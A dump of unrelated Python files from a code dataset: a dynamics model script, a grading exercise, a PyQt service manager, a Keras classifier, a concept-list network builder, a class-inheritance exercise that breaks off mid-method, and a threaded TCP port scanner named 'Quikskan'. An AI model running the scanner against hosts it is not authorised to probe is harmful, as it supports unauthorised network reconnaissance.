('vcs_y',), mirror=True)\n\n# Drive Torque:\n# =============\nsym_config.add_relation.Equal_to('ax1_far_drive', ('vcs_y',), mirror=True)\n\n# Creating Geometries\n# ===================\nsym_config.add_scalar.UserInput('shafts_radius')\n\nsym_config.add_geometry.Cylinder_Geometry('inner_shaft', ('hpr_diff_input', 'hpr_inner_cv','s_shafts_radius'), mirror=True)\nsym_config.assign_geometry_to_body('rbr_inner_shaft', 'gmr_inner_shaft', mirror=True)\n\nsym_config.add_geometry.Cylinder_Geometry('coupling_inner', ('hpr_inner_cv', 'hpr_coupling_mid','s_shafts_radius'), mirror=True)\nsym_config.assign_geometry_to_body('rbr_coupling_inner', 'gmr_coupling_inner', mirror=True)\n\nsym_config.add_geometry.Cylinder_Geometry('coupling_outer', ('hpr_coupling_mid', 'hpr_outer_cv','s_shafts_radius'), mirror=True)\nsym_config.assign_geometry_to_body('rbr_coupling_outer', 'gmr_coupling_outer', mirror=True)\n\n\n# 
Exporting the configuration as a JSON file\nsym_config.export_JSON_file(data_dir)\n\n# ============================================================= #\n#                       Code Generation\n# ============================================================= #\n\nfrom uraeus.nmbd.python import templatebased_project\nproject = templatebased_project(database_directory)\n\nproject.write_topology_code(sym_model)\n","sub_path":"symenv/templates/drive_shafts_v2/sym_model.py","file_name":"sym_model.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"448976232","text":"alunos = [\n    {\n        'nome': 'João',\n        'respostas': [\n            'C',\n            'A',\n            'D',\n            'B',\n            'D'\n        ]\n    },\n    {\n        'nome': 'Maria',\n        'respostas': [\n            'C',\n            'D',\n            'D',\n            'D',\n            'D'\n        ]\n    }\n]\n\ngabarito = [\n    'A',\n    'A',\n    'B',\n    'A',\n    'A'\n]\n\npeso = [\n    3,\n    2,\n    1,\n    1,\n    3\n]\n\ndef calcular_nota(lista_alunos, gabarito, peso, posicao_aluno):\n    aluno = lista_alunos[posicao_aluno]\n    lista_respostas = aluno['respostas']\n    nome_aluno = aluno['nome']\n    contador_gabarito = 0\n    contador_peso = 0\n    nota_aluno = 0\n    for resposta in lista_respostas:\n        if resposta == gabarito[contador_gabarito]:\n            nota_aluno = nota_aluno + peso[contador_peso]\n        contador_gabarito = contador_gabarito + 1\n        contador_peso = contador_peso + 1\n    print(f'The grade of student {nome_aluno} is {nota_aluno}')\n\ncalcular_nota(alunos, gabarito, peso, 0)\ncalcular_nota(alunos, gabarito, peso, 1)","sub_path":"Exercício 1.py","file_name":"Exercício 1.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"230944832","text":"# -*- coding: utf-8 -*-\n\n# 2019/3/19 0019 9:45 AM\n\n__author__ = 'RollingBear'\n\nimport config\nimport system_service\n\nimport os\nimport time\n\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtWidgets import QDesktopWidget, QMessageBox, QPushButton, QToolButton, QMenu, QAction, QGridLayout, QLabel\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import Qt\n\n\nclass service_management(QWidget):\n\n    def __init__(self):\n\n        '''\n        Initialize the service management window\n        '''\n\n        super().__init__()\n\n        self.conf = config.config('\\\\config\\\\config.ini')\n        self.service_list = config.config('\\\\config\\\\service_name.ini')\n\n        self.len_count = self.service_list.outer_element_count()\n\n        self.red_img = QPixmap(self.conf.get('image_address').red)\n        self.green_img = QPixmap(self.conf.get('image_address').green)\n        self.yellow_img = QPixmap(self.conf.get('image_address').yellow)\n        self.logo_img = QPixmap(self.conf.get('image_address').logo)\n        self.message_img = QPixmap(self.conf.get('image_address').message)\n\n        self.system_svc = system_service.system_service()\n\n        self.init_ui()\n\n    def init_ui(self):\n\n        '''\n        Initialize the service management UI\n        :return: None\n        '''\n\n        self.grid = QGridLayout()\n        self.setLayout(self.grid)\n        self.grid.setSpacing(10)\n\n        for i in range(self.len_count):\n            service_display_name = self.service_list.get('service_' + str(i + 1)).service_display_name\n            service_name = self.service_list.get('service_' + str(i + 1)).service_name\n            service_log = self.service_list.get('service_' + str(i + 1)).service_log\n            service_setup = self.service_list.get('service_' + str(i + 1)).service_setup\n\n            if service_log == 'Null':\n                service_log = None\n            else:\n                service_log = os.path.abspath(os.path.dirname(os.getcwd()) + os.path.sep + (\n                    '.' 
* service_log.count('..\\\\'))) + '\\\\' + service_log.replace('..\\\\', '')\n\n service_setup = os.path.abspath(os.path.dirname(os.getcwd()) + os.path.sep + (\n '.' * service_setup.count('..\\\\'))) + '\\\\' + service_setup.replace('..\\\\', '')\n\n self.paint_tool_button(i, service_display_name, service_name, service_log, service_setup)\n\n self.get_state(i, service_name)\n\n self.mes_label = QLabel(self)\n self.mes_label.setPixmap(self.message_img)\n self.grid.addWidget(self.mes_label, self.len_count + 1, 0, 1, 3)\n\n log_address = self.conf.get('file_address').log_file_address\n self.paint_button('open file', self.len_count + 2, 0, self.system_svc.open_file, log_address)\n self.paint_button('start all', self.len_count + 2, 1, self.state_operate, 'start')\n self.paint_button('stop all', self.len_count + 2, 2, self.state_operate, 'stop')\n\n self.center()\n self.setWindowTitle('Service Management')\n\n self.show()\n\n def paint_tool_button(self, row, service_display_name, service_name, service_log_address, service_setup_address):\n\n '''\n Packaging the tool button paint to reduce code quantity\n :param row: the number of rows in which the button is located\n :param service_display_name: the service's name which to display\n :param service_name: service's name\n :param service_log_address: the address of the log file for the service\n :param service_setup_address: the address of the installation document for the service\n :return: None\n '''\n\n self.tool_button = QToolButton(self)\n self.tool_button.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)\n self.tool_button.setToolTip('Select a action to perform')\n self.tool_button.setPopupMode(QToolButton.MenuButtonPopup)\n self.tool_button.setText(service_display_name)\n self.tool_button.setAutoRaise(True)\n self.grid.addWidget(self.tool_button, row, 0)\n\n tb_menu = QMenu()\n\n start_service = QAction('Start Service', self)\n stop_service = QAction('Stop Service', self)\n restart_service = QAction('ReStart Service', self)\n service_log = QAction('Open Service Log', self)\n service_start_auto = QAction('Set Service Start Auto', self)\n service_start_demand = QAction('Set Service Start Demand', self)\n service_disable = QAction('Set Service Disable', self)\n service_setup = QAction('Setup the Service', self)\n service_delete = QAction('Uninstall the Service', self)\n\n tb_menu.addAction(start_service)\n tb_menu.addAction(stop_service)\n tb_menu.addAction(restart_service)\n tb_menu.addSeparator()\n tb_menu.addAction(service_log)\n tb_menu.addSeparator()\n tb_menu.addAction(service_start_auto)\n tb_menu.addAction(service_start_demand)\n tb_menu.addAction(service_disable)\n tb_menu.addSeparator()\n tb_menu.addAction(service_setup)\n tb_menu.addAction(service_delete)\n\n self.tool_button.setMenu(tb_menu)\n\n start_service.triggered.connect(lambda: on_click(row, 'start', service_name))\n stop_service.triggered.connect(lambda: on_click(row, 'stop', service_name))\n restart_service.triggered.connect(lambda: on_click(row, 'restart', service_name))\n service_log.triggered.connect(lambda: on_click(row, 'log', service_log_address))\n service_start_auto.triggered.connect(lambda: on_click(row, 'auto_start', service_name))\n service_start_demand.triggered.connect(lambda: on_click(row, 'auto_demand', service_name))\n service_disable.triggered.connect(lambda: on_click(row, 'disable', service_name))\n service_setup.triggered.connect(lambda: on_click(row, 'setup', service_setup_address, service_name))\n service_delete.triggered.connect(lambda: on_click(row, 
'uninstall', service_name))\n\n        def on_click(row, action, mes, param=None):\n\n            '''\n            Button click event control\n            :param row: the number of rows in which the button is located\n            :param action: name of the tool-button action to perform\n            :param mes: main argument for the action (service name or file path)\n            :param param: optional extra argument for the action\n            :return:\n            '''\n\n            result = None\n\n            if action == 'start' or action == 'stop':\n                step = self.system_svc.service_state_operate(mes, action)\n                if step != 'uninstalled' and step != 'active' and step != 'inactive':\n                    time.sleep(0.5)\n                    result = self.system_svc.get_service_state(mes)\n                else:\n                    result = step\n            elif action == 'restart':\n                step = self.system_svc.restart_service(mes)\n                if step != 'uninstalled':\n                    time.sleep(0.5)\n                    result = self.system_svc.get_service_state(mes)\n                else:\n                    result = step\n            elif action == 'log':\n                result = self.system_svc.open_log(mes)\n            elif action == 'auto_start' or action == 'auto_demand' or action == 'disable':\n                result = self.system_svc.auto_start_service(mes, action)\n            elif action == 'setup':\n                result = self.system_svc.open_setup(param, mes)\n            elif action == 'uninstall':\n                result = self.system_svc.delete_service(mes)\n\n            self.state_pic.deleteLater()\n            self.state_label.deleteLater()\n            self.get_state(row, mes)\n\n            if result == 'uninstalled':\n                QMessageBox.about(self, 'Error', 'Service uninstalled')\n            else:\n                if action == 'log' or action == 'auto_start' or action == 'setup':\n                    QMessageBox.about(self, 'result', 'Executed operation')\n                elif action == 'start' or action == 'stop' or action == 'restart':\n                    if result == 'active' and action == 'start':\n                        QMessageBox.about(self, 'result', '{name} has already started'.format(name=mes))\n                    elif result == 'active' and action == 'stop':\n                        QMessageBox.about(self, 'Error', '{name} stop error'.format(name=mes))\n                    elif result == 'inactive' and action == 'stop':\n                        QMessageBox.about(self, 'result', '{name} has already stopped'.format(name=mes))\n                    elif result == 'inactive' and action == 'start':\n                        QMessageBox.about(self, 'Error', '{name} start error'.format(name=mes))\n                    elif result == 'success' or result == 'error':\n                        QMessageBox.about(self, 'result',\n                                          '{name} {state} {result}'.format(name=mes, state=action, result=result))\n                elif action == 'uninstall':  # the menu handler passes 'uninstall', not 'delete'\n                    QMessageBox.about(self, 'result',\n                                      '{name} {state} {result}'.format(name=mes, state=action, result=result))\n\n    def get_state(self, row, service_name):\n\n        '''\n        Get service's state\n        :param row: the number of rows in which the message is located\n        :param service_name: service's name\n        :return: None\n        '''\n\n        state = self.system_svc.get_service_state(service_name)\n        mes = 'Initialization'\n        pic = self.red_img\n\n        if state == 'active':\n            mes = 'Started'\n            pic = self.green_img\n        elif state == 'inactive':\n            mes = 'Not started'\n            pic = self.red_img\n        elif state == 'uninstalled':\n            mes = 'Not installed'\n            pic = self.yellow_img\n\n        self.state_pic = QLabel(self)\n        self.state_pic.setPixmap(pic)\n        self.grid.addWidget(self.state_pic, row, 1)\n\n        self.state_label = QLabel(mes, self)\n        self.grid.addWidget(self.state_label, row, 2)\n\n    def paint_button(self, btn_name, row, column, function, *args, **kwargs):\n\n        '''\n        Packaging the button paint to reduce code quantity\n        :param btn_name: button's name\n        :param row: the number of rows in which the button is located\n        :param column: the number of columns in which the button is located\n        :param function: the function which is linked to the button\n        :param args: button-linked-function's params\n        :param kwargs: button-linked-function's params\n        :return: None\n        '''\n\n        button = QPushButton(btn_name, self)\n        button.setCheckable(False)\n        self.grid.addWidget(button, row, column)\n\n        button.clicked.connect(lambda: function(*args, **kwargs))\n\n    def center(self):\n\n        '''\n        Center the window on the screen\n        :return: None\n        '''\n\n        geometry = self.frameGeometry()\n        center_point = QDesktopWidget().availableGeometry().center()\n        geometry.moveCenter(center_point)\n        self.move(geometry.topLeft())\n\n    def closeEvent(self, QCloseEvent):\n\n        '''\n        Show a confirmation box when closing the window\n        :param QCloseEvent:\n        :return: None\n        '''\n\n        reply = QMessageBox.question(self, 'Message', 'Are you sure to quit?',\n                                     QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n\n        if reply == QMessageBox.Yes:\n            QCloseEvent.accept()\n        else:\n            QCloseEvent.ignore()\n\n    def state_operate(self, state):\n\n        '''\n        Start or stop every configured service (linked to the \"start all\"/\"stop all\" buttons)\n        :param state: 'start' or 'stop', used to distinguish the operation\n        :return: None\n        '''\n\n        success_count = 0\n        uninstall_count = 0\n        error_count = 0\n        already_count = 0\n\n        for i in range(self.len_count):\n            result = self.system_svc.service_state_operate(self.service_list.get('service_' + str(i + 1)).service_name,\n                                                           state)\n            if result == 'success':\n                success_count += 1\n            elif result == 'uninstalled':\n                uninstall_count += 1\n            elif result == 'error':\n                error_count += 1\n            elif result == 'active' or result == 'inactive':\n                already_count += 1\n\n            self.get_state(i, self.service_list.get('service_' + str(i + 1)).service_name)\n\n        QMessageBox.about(self, 'result',\n                          '{success_count}/{totality_count} {state} succeeded\\n'\n                          '{uninstall_count}/{totality_count} uninstalled\\n'\n                          '{error_count}/{totality_count} {state} error\\n'\n                          '{already_count}/{totality_count} already {state}'.format(\n                              success_count=success_count, uninstall_count=uninstall_count,\n                              error_count=error_count, already_count=already_count,\n                              totality_count=self.len_count, state=state))\n","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":12994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"67974527","text":"from __future__ import print_function\nimport numpy as np\nnp.random.seed(1337) # for reproducibility\n\n#from keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.optimizers import SGD, Adam, RMSprop\nfrom keras.utils import np_utils\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import load_model\nimport pickle\nimport glob\nimport os\n\ntest_features = []\ntest_labels = []\ntrain_features = []\ntrain_labels = []\nfeatures = []\nlabels = []\ntraining = True\nmaxcount = 260\nclass_num = 8\nfeature_num = 14\nignore_back = True\ndata_type = 'butt' #databack0628 is butt_back\ndata_folder = 'data0609/'\nmodel_folder = \"kfold_model_mlp_1_64/\"\nresult_file = 'result_mlp_1_64.txt'\nfolderName = ['1_proper','3_lying','4_left','5_right','6_leftcross','7_rightcross','8_leftcross1','9_rightcross1']\n# testName = ['andy_','chiang_','chris_','cliff_','eric_','eric2_','ethan_','ginger_','howard_','jessica_','lulu_','morris2_','nemo_','nemo2_','ruby_','ryan_','ryan2_','sara_','scott_','weiting_','wen_','yao2_','yuwen_']\ntestName = glob.glob(data_folder+'/'+folderName[0]+'/*.txt')\nfresult = open(data_folder+result_file,'w')\nfresult.close()\nfor i in range(len(testName)):\n\tstring = folderName[0].replace('1_','')\n\ttestName[i] = testName[i].replace(data_folder+'/'+folderName[0]+'/','').replace(string+'.txt','')\n# removeName = 
['chiang_','cliff_','chunhao_','ryan_']\n# removeName = ['chiang_','chris_','cliff_','eric_','hhvs1354_','chunhao_','sara_','ryan_']\n# for i in range(len(removeName)):\n# \ttestName.remove(removeName[i])\n\nfor name in testName:\n\ttest_features.append([])\n\ttest_labels.append([])\n\ttrain_features.append([])\n\ttrain_labels.append([])\n\tfor i in folderName:\n\t\tfile_list = glob.glob(data_folder+'/'+i+\"/*.txt\")\n\t\tfor j in file_list:\n\t\t\tf = open(j,'r')\n\t\t\tcount = 0\n\t\t\tfor k in f:\n\t\t\t\tif count == maxcount:\n\t\t\t\t\tbreak\n\t\t\t\tline = k.split()\n\t\t\t\tif len(line) != feature_num:\n\t\t\t\t\tcontinue\n\t\t\t\ttemp = list(map(int,line))\n\t\t\t\tif data_type=='butt_back' and ignore_back:\n\t\t\t\t\ttemp = temp[0:7]+temp[14:21]\n\t\t\t\tif '/'+name in j:\n\t\t\t\t\ttest_features[-1].append(temp)\n\t\t\t\t\ttest_labels[-1].append(folderName.index(i))\n\t\t\t\telse:\n\t\t\t\t\ttrain_features[-1].append(temp)\n\t\t\t\t\ttrain_labels[-1].append(folderName.index(i))\n\t\t\t\tcount += 1\n\nif not os.path.exists(data_folder+model_folder):\n\tos.mkdir(data_folder+model_folder)\naccuracy_list = [0]*len(testName)\nacc_num_people = []\nall_error_matrix = np.zeros((class_num,class_num))\nfor i in range(class_num):\n\tacc_num_people.append([0]*10)\nfor val in range(len(testName)):\n\n\tbatch_size = 128\n\tnb_classes = class_num\n\tnb_epoch = 100\n\n\t# the data, shuffled and split between train and test sets\n\t[X_train, y_train, X_test, y_test] = [train_features[val],train_labels[val],test_features[val],test_labels[val]]\n\tX_train = np.array(X_train)\n\ty_train = np.array(y_train)\n\tX_test = np.array(X_test)\n\ty_test = np.array(y_test)\n\t#X_train = X_train.reshape(60000, 784)\n\t#X_test = X_test.reshape(10000, 784)\n\tX_train = X_train.astype('float32')\n\tX_test = X_test.astype('float32')\n\tX_train /= 1024\n\tX_test /= 1024\n\tprint(X_train.shape[0], 'train samples')\n\tprint(X_test.shape[0], 'test samples')\n\t\n\t# convert class vectors to binary class matrices\n\tY_train = np_utils.to_categorical(y_train, nb_classes)\n\tY_test = np_utils.to_categorical(y_test, nb_classes)\n\n\tif training:\n\t\tmodel = Sequential()\n\t\tif data_type=='butt_back' and ignore_back:\n\t\t\tmodel.add(Dense(64, input_shape=(feature_num/2,)))\n\t\telse:\n\t\t\tmodel.add(Dense(64, input_shape=(feature_num,)))\n\t\tmodel.add(Activation('tanh'))\n\t\tmodel.add(Dropout(0.2))\n\t\t# model.add(Dense(128))\n\t\t# model.add(Activation('tanh'))\n\t\t# model.add(Dropout(0.2))\n\t\tmodel.add(Dense(nb_classes))\n\t\tmodel.add(Activation('softmax'))\n\n\t\tmodel.summary()\n\n\t\tmodel.compile(loss='categorical_crossentropy',\n\t\t optimizer=SGD(lr=0.01),\n\t\t metrics=['accuracy'])\n\t\tcheckpointer = ModelCheckpoint(filepath=data_folder+model_folder+testName[val]+'.h5', verbose=0, save_best_only=True)\n\t\thistory = model.fit(X_train, Y_train,\n\t\t batch_size=batch_size, nb_epoch=nb_epoch,\n\t\t verbose=1, validation_data=(X_test, Y_test),\n\t\t callbacks=[checkpointer])\n\t\t# model.save(model_folder+testName[val]+'.h5')\n\n\t# load model\n\tmodel = load_model(data_folder+model_folder+testName[val]+'.h5')\n\n\t# evaluate\n\tscore = model.evaluate(X_test, Y_test, verbose=0)\n\terror_matrix = np.zeros((nb_classes,nb_classes))\n\tresults = model.predict(X_test)\n\tfor i in range(len(results)):\n\t\terror_matrix[list(Y_test[i]).index(max(Y_test[i]))][list(results[i]).index(max(results[i]))]+=1\n\tprint(error_matrix)\n\tprint('Test score:', score[0])\n\tprint('Test accuracy:', 
score[1])\n\taccuracy_list[val] = score[1]\n\n\n\tfresult = open(data_folder+result_file,'a')\n\tfresult.write(testName[val]+'- error matrix: \\n')\n\tall_error_matrix += error_matrix\n\tfor error in error_matrix:\n\t\tfresult.write(str(error)+'\\n')\n\tfor i in range(len(error_matrix)):\n\t\teach_pose_acc = float(error_matrix[i][i])/sum(error_matrix[i])\n\t\tfresult.write(str(each_pose_acc)+'\\n')\n\t\ttry:\n\t\t\tacc_num_people[i][int(each_pose_acc*10-0.1)] += 1\n\t\texcept:\n\t\t\timport pdb;pdb.set_trace()\n\tfresult.write(testName[val]+'- accuracy: '+str(accuracy_list[val])+'\\n')\n\tfresult.close()\n\n\n\nfresult = open(data_folder+result_file,'a')\nfresult.write('average accuracy: '+str(sum(accuracy_list)/len(testName))+'\\n')\nfor pose in acc_num_people:\n\tfresult.write(str(pose)+'\\n')\nfresult.write('average error matrix: \\n')\nfor i in range(len(all_error_matrix)):\n\tall_error_matrix[i] = all_error_matrix[i]/float(sum(all_error_matrix[i]))\n\tfresult.write(str(all_error_matrix[i])+'\\n')\nfresult.close()\ntable_file = data_folder+result_file.replace('txt','jpg')\nexecfile(\"test_table.py\")","sub_path":"kfold.py","file_name":"kfold.py","file_ext":"py","file_size_in_byte":5791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"176822392","text":"from concepticondata.util import *\nfrom lingpy import *\nimport lingpy\nfrom glob import glob\nfrom sys import argv\nimport networkx as nx\nfrom sys import argv\n\nclists = glob('../concepticondata/conceptlists/*.tsv')\nconcepticon = dict([(a,b) for a,*b in csv2list('../concepticondata/concepticon.tsv',\n strip_lines=False)])\n\n#clists = [l for l in clists if len(l.split('-')[-1][:-4]) == 3 and\n# l.split('-')[-1][0] in '12']\nprint(len(clists))\n\n\nG = nx.Graph()\nC = {}\n\nif 'best' in argv:\n for i,l1 in enumerate(clists):\n \n list1 = load_conceptlist(l1)\n name1 = l1.split('/')[-1][:-4]\n if 'GLOSS' in list1['header']:\n key = 'GLOSS'\n else:\n key = 'ENGLISH'\n \n set1 = dict(set([\n (list1[k]['CONCEPTICON_ID'], list1[k][key]) for k in list1 if k not in \n ['header','splits','mergers']\n ]))\n print('[i] analyzing list {0}...'.format(name1))\n for k in set1:\n try:\n C[k] += [name1]\n except KeyError:\n C[k] = [name1]\n \n print(len([x for x in C if len(C[x]) >= 70]))\n \n best_concepts = []\n with open('best-concepts.tsv', 'w') as f:\n for x in C:\n if len(C[x]) >= 50:\n f.write(x+'\\n')\n best_concepts += [x]\n print(len(best_concepts))\n\n\nelse:\n\n best_concepts = [x[0] for x in csv2list('best-concepts.tsv')]\n\n\n_clists = []\nSTATES = {}\nfor i,l1 in enumerate(clists):\n \n list1 = load_conceptlist(l1)\n name1 = l1.split('/')[-1][:-4]\n if 'GLOSS' in list1['header']:\n key = 'GLOSS'\n else:\n key = 'ENGLISH'\n\n set1 = dict(set([\n (list1[k]['CONCEPTICON_ID'], list1[k][key]) for k in list1 if k not in \n ['header','splits','mergers']\n ]))\n \n if len([k for k in set1 if k in best_concepts]) >= 70:\n if 'GLOSS' in list1['header']:\n pass\n else:\n _clists += [l1]\n\n for k in best_concepts:\n \n try:\n v = set1[k]\n except:\n v = '?'\n\n try:\n STATES[k] += [v]\n except KeyError:\n STATES[k] = [v]\n\nfor k,v in STATES.items():\n states = sorted(set(v))\n tmp = {}\n for i,j in zip(states,'abcdefghijklmnopqrstuvw'):\n if i != '?':\n tmp[i] = j\n else:\n tmp[i] = '?'\n STATES[k] = tmp\ninput('bishier')\n\n\n\n\n\n\nprint(len(_clists))\n\nM = [[0 for l in _clists] for n in _clists]\nnames = []\n\nstates = ''\n\nfor i,l1 in enumerate(_clists):\n \n list1 = 
load_conceptlist(l1)\n name1 = l1.split('/')[-1][:-4]\n names += [name1.replace('-','_')]\n if 'GLOSS' in list1['header']:\n key = 'GLOSS'\n else:\n key = 'ENGLISH'\n\n set1 = dict(set([\n (list1[k]['CONCEPTICON_ID'], list1[k][key]) for k in list1 if k not in \n ['header','splits','mergers']\n ]))\n print('[i] analyzing list {0}...'.format(name1))\n\n states += name1+'\\t'\n for k in best_concepts:\n if k in set1:\n states += STATES[k][set1[k]]\n else:\n states += '?'\n states += '\\n'\n\n for j,l2 in enumerate(_clists):\n if i < j:\n\n list2 = load_conceptlist(l2)\n name2 = l2.split('/')[-1][:-4]\n\n if 'GLOSS' in list2['header']:\n key = 'GLOSS'\n else:\n key = 'ENGLISH'\n \n set2 = dict(set([\n (list2[k]['CONCEPTICON_ID'], list2[k][key]) for k in list2 if k not in \n ['header','splits','mergers']\n ]))\n\n commons = [k for k in set1 if k in set2]\n ld = []\n for k in best_concepts:\n if k in set1 and k in set2:\n if set1[k] == set2[k]:\n ld += [0]\n else:\n ld += [0.95]\n else:\n pass\n #ld += [1]\n\n #ld += [edit_dist(set1[k],set2[k], normalized=True)]\n if ld:\n d = sum(ld) / len(ld)\n else:\n d = 1\n\n if d < 0.05:\n G.add_edge(name1, name2, weight=1-d)\n M[i][j] = d\n M[j][i] = d\n \n\nwith open('states.nex', 'w') as f:\n f.write(states)\n\n\ntxt = lingpy.convert.strings.matrix2dst(M, taxa=names, taxlen=0)\nwith open('distances.dst', 'w') as f:\n f.write(txt)\n\nnx.write_gml(G, 'network.gml')\n","sub_path":"helpers/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"64448054","text":"#This is a fast port scanner. Works on the principle of threading which\r\n#gives it much faster speeds.\r\nimport socket,sys,time,threading,re\r\n\r\nactive_ports = {}\r\n\r\n#function machinery is the backbone and is fed into threading\r\ndef machinery(ip,port):\r\n\ts = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n\ts.settimeout(1)\r\n\ttry:\r\n\t\ts.connect((ip,port))\r\n\t\tactive_ports[port] = 'ON'\r\n\texcept:\r\n\t\tactive_ports[port] = ''\r\n\r\n#a function for reading port range in a min-max format\r\ndef port_ends(r):\r\n\tvals = r.split('-')\r\n\r\n\tvals[0] = int(vals[0])\r\n\tvals[1] = int(vals[1])\r\n\r\n\t#for bad input\r\n\tif vals[1] < vals[0]:\r\n\t\ttemp = vals[1]\r\n\t\tvals[1] = vals[0]\r\n\t\tvals[0] = temp\r\n\r\n\treturn vals\r\n\r\n#The function that works to thread the machinery\r\ndef scan(ip,num_threads,r):\r\n\tends = port_ends(r)\r\n\tlast_port = ends[1]\r\n\tcount = ends[0]\r\n\toffset = count\r\n\r\n\tif last_port > 65535:\r\n\t\tprint(\"Invalid ports! 
Quitting!\")\r\n\t\tmain()\r\n\r\n\r\n\tthreads = []\r\n\r\n\twhile count <= last_port:\r\n\t\tfor i in range(count,count+num_threads):\r\n\t\t\tt = threading.Thread(target=machinery,args=(ip,i))\r\n\t\t\tthreads.append(t)\r\n\t\t\tthreads[i-offset].start()\r\n\r\n\t\tfor i in range(count,count+num_threads):\r\n\t\t\tthreads[i-offset].join()\r\n\r\n\t\tfor i in range(count,count+num_threads):\r\n\t\t\tif active_ports[i] == 'ON':\r\n\t\t\t\tprint(f\"Port {i} is ON\")\r\n\r\n\t\tcount += num_threads\r\n\r\n\r\ndef main():\r\n\r\n\t#print welcome banner\r\n\tprint(\"\"\"\r\n /$$$$$$ /$$ /$$ /$$$$$$ /$$ /$$ /$$$$$$ /$$ /$$ /$$$$$$ /$$ /$$ \r\n /$$__ $$| $$ | $$|_ $$_/| $$ /$$/ /$$__ $$| $$ /$$/ /$$__ $$| $$$ | $$ \r\n| $$ \\ $$| $$ | $$ | $$ | $$ /$$/ | $$ \\__/| $$ /$$/ | $$ \\ $$| $$$$| $$ \r\n| $$ | $$| $$ | $$ | $$ | $$$$$/ | $$$$$$ | $$$$$/ | $$$$$$$$| $$ $$ $$ \r\n| $$ | $$| $$ | $$ | $$ | $$ $$ \\____ $$| $$ $$ | $$__ $$| $$ $$$$ \r\n| $$/$$ $$| $$ | $$ | $$ | $$\\ $$ /$$ \\ $$| $$\\ $$ | $$ | $$| $$\\ $$$ \r\n| $$$$$$/| $$$$$$/ /$$$$$$| $$ \\ $$| $$$$$$/| $$ \\ $$| $$ | $$| $$ \\ $$ \r\n \\____ $$$ \\______/ |______/|__/ \\__/ \\______/ |__/ \\__/|__/ |__/|__/ \\__/ \r\n \\__/ \r\n \r\n \t\"\"\")\r\n\r\n\tprint(\"<---------------------------------Version (0.1)---------------------------------------------->\\n\")\r\n\r\n\tip = input(\"Enter the IP Address of the host : \")\r\n\tprint(f\"You entered IP : {ip}\\n\")\r\n\r\n\tprint(\"Choose an option : \\n 1. Scan for common ports \\n 2. Custom scan \\n 3. Go Home\\n\")\r\n\r\n\tchoice = int(input(\"Your choice : \"))\r\n\r\n\r\n\tif choice == 1:\r\n\t\tnum_threads = int(input(\"\\nSet the number of threads (1-200) : \"))\r\n\r\n\t\tif num_threads < 1 or num_threads > 200:\r\n\t\t\tnum_threads = int(input(\"Please enter a valid number of threads : \"))\r\n\r\n\t\telse:\r\n\t\t\tstart = time.time()\r\n\t\t\tr = '1-1000'\r\n\t\t\tprint(\"\\n\")\r\n\t\t\tscan(ip,num_threads,r)\r\n\t\t\tprint(f\"\\nPort sacn finished! Process completed in {round(time.time()-start,2)} seconds\")\r\n\t\t\tsys.exit()\r\n\r\n\r\n\r\n\telif choice == 2:\r\n\t\tr = input(\"\\nEnter the port range (min-max, eg 1-1000) : \")\r\n\r\n\t\tnum_threads = int(input(\"Set the number of threads (1-200) : \"))\r\n\r\n\t\tif num_threads < 1 or num_threads > 200 :\r\n\t\t\tnum_threads = int(input(\"Please enter a valid number of threads (1-200) : \"))\r\n\r\n\t\telse:\r\n\t\t\tstart = time.time()\r\n\t\t\tprint(\"\\n\")\r\n\t\t\tscan(ip,num_threads,r)\r\n\t\t\tprint(f\"\\nPort scan finished! Process completed in {round(time.time()-start,2)} seconds\")\r\n\t\t\tsys.exit()\r\n\r\n\telif choice == 3:\r\n\t\tprint(\"Quitting program!\")\r\n\t\tsys.exit()\r\n\r\n\telse:\r\n\t\tprint(\"Invalid choice. 
Quitting!\")\r\n\t\tsys.exit()\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\ttry:\r\n\t\tmain()\r\n\texcept KeyboardInterrupt:\r\n\t\tprint(\"Quitting program!\")\r\n\t\tsys.exit()\r\n\r\n\r\n\r\n\r\n\t\t\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t","sub_path":"Quikskan/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"39757615","text":"\nclass School(object):\n def __init__(self,name,addr):\n self.name = name\n self.addr = addr\n self.students = []\n self.teacher = []\n def enrool(self,stu_obj):\n print(\"为学员%s办理注册手续\" % stu_obj.name)\n self.students.append(stu_obj.name)\n def hire(self,tea_obj):\n print(\"雇佣%s为%s教学老师\" % (tea_obj.name,tea_obj.course))\n self.teacher.append(tea_obj.name)\n\nclass SchoolMenber(object): #object属于基类,祖师爷级别的\n def __init__(self,name,age,sex):\n self.name = name\n self.age = age\n self.sex = sex\nclass Teacher(SchoolMenber):\n def __init__(self,name,age,sex,salary,course):\n super(Teacher,self).__init__(name,age,sex)\n self.salary = salary\n self.course = course\n def tell(self):\n print('''----教师信息----\nname %s\nage %s\nsex %s\nsalary %s\ncourse %s''' % (self.name,self.age,self.sex,self.salary,self.course))\n def teach(self):\n print(\"%s正在讲%s\" %(self.name,self.course))\n\nclass Student(SchoolMenber):\n def __init__(self,name,age,sex,stu_id,grade):\n super(Student,self).__init__(name,age,sex)\n self.stu_id = stu_id\n self.grade = grade\n def tell(self):\n print('''----学生信息----\nname %s\nage %s\nsex %s\nstu_id %s\ngrade %s''' % (self.name,self.age,self.sex,self.stu_id,self.grade))\n def pay_tuition(self,amount):\n 